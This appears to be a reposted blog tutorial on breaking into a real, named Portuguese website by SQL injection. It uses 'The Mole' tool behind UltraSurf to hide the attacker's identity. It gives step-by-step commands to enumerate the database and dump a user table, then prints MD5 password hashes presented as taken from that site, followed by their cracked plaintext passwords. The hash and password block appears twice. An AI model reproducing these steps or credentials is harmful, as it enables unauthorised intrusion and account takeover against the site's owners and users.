Ok for this you will required three things :-
Name Downloading Link(s)
01. The Mole : The Mole
02. UltraSurf (IP Hiding Software) : UltraSurf
03. SQLi Injected Website
UltraSurf Tutorial :
STEPS :
1. First of all hide your identity UltraSurf.
2. Open "mole.exe" from TheMole folder.
3. Now In the Mole Type : "url http://targetedsite.com/title.php?id=1" without quotes. My target is : http://www.alfanord.pt/pages.php?rid=125
4. Now find the "keyword" of the website, in my case my keyword is " .... "
So, now type "needle keyword" without quotes
5. Now type "schemas" without quotes and wait for a while....
We Got The Database : alfanord
6. Now for getting the table we will type "tables <databasename>" without quotes and wait for a while...
7. Now we got the tables, now its time to get the column of the table.
In my case i have selected "frm_users" table for getting the column,So We will use this command for getting the column of the selected table and that is
: "column <databasename> <tablename> without quotes and in my case it is :
column alfanord frm_users
now we will search which one of those tables can have the admin info :
we will try this one : frm_users
so we will write columns alfanord frm_users
ok the passwords are :
01a11ac7e1627fd7dc60d41db0f1ffae
0b2b4ce1ca6c95b339d752ba784adff6
44f48c1358e247cc7dd2e68d159085a0
564cbc5755e4c126327ff4f9b4d55d56
5ef56e179b9336e0208c751a97cc83c6
crypted by MD5 , so we can just simply decry-pt them in http://md5decrypter.co.uk/
so the pass are :
josesantos
XgVgc5h8
jspcunha
trsport
bb2269ff
01a11ac7e1627fd7dc60d41db0f1ffae
0b2b4ce1ca6c95b339d752ba784adff6
44f48c1358e247cc7dd2e68d159085a0
564cbc5755e4c126327ff4f9b4d55d56
5ef56e179b9336e0208c751a97cc83c6
crypted by MD5 , so we can just simply decry-pt them in http://md5decrypter.co.uk/
so the pass are :
josesantos
XgVgc5h8
jspcunha
trsport
bb2269ff
Original : http://www.hackerscafe.in/2014/01/how-to-hack-sqli-injected-website-with.html
http://www.youtube.com/watch?v=OLmj8F1CwOw
